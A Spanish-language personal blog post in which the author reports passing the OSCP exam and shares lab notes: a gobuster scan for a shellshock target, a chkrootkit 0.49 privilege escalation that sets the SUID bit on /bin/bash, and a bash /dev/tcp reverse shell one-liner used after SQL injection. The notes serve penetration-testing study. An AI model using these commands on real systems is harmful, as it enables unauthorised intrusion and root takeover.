Grunt's personal blog

this is my personal blog for my hacking stuff, my degree stuff, etc

View on GitHub

OSCP preparation

List

Aprobé el examen

Bueno mis queridos lectores de mi humilde blog, les quería comentar que este Domingo 13 de Julio del 2025 me llegó el mail de Offensive Security que me decía que había aprobado el examen de OSCP. Mi recorrido por este examen fue bastante arduo y largo pues hice una sobrepreparación porque leí demasiada gente llorando y copeando en /r/OSCP que me dió un poco de miedo reprobarlo y tener que pagar el recuperatorio que cuesta como 150 dolares. Lo que hice para prepararme fue:


¿Y ahora que?

Ahora probablemente siga estudiando topicos que me interesan que no son tanto de “pentesting” como tal.

Extras

Maquina centOS una privesc rara

En una maquina que pwnee que tenía la vuln shellshock, fue clave la enumeración para poder explotar la misma

❯ gobuster dir -u http://10.10.10.56/cgi-bin -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 400 -x cgi,php,sh --add-slash

el -x sh me dió la enumeración correcta

Sí encuentro el puerto 53 es conveniente seguir la siguiente guía de enumeración https://book.hacktricks.xyz/network-services-pentesting/pentesting-dns

Vulnerabilidad en chkrootkit versión 0.49. Para evitar usar metasploit, sirve chequear:

https://www.exploit-db.com/exploits/33899

cat /etc/cron.daily

/usr/bin/chkrootkit
ls -la /usr/bin/chkrootkit     // Do we have SUID?
chkrootkit -V
echo "#!/bin/bash" > /tmp/update
echo "chmod +s /bin/bash" >> /tmp/update
Wait a While ...
/bin/bash -p
whoami

Problemas para reverse shell dentro de sqli

Hay veces que cuando puedo obtener RCE mediante una sqli porque tengo acceso de escritura con el user de la db que maneja la aplicación web no siempre me quiere ejecutar bien una revshell, pero con esto sí:

bash -c 'bash -i >& /dev/tcp/$IP/$PORT 0>&1'

es el único que me vino funcionando en 2 maquinas de SQLI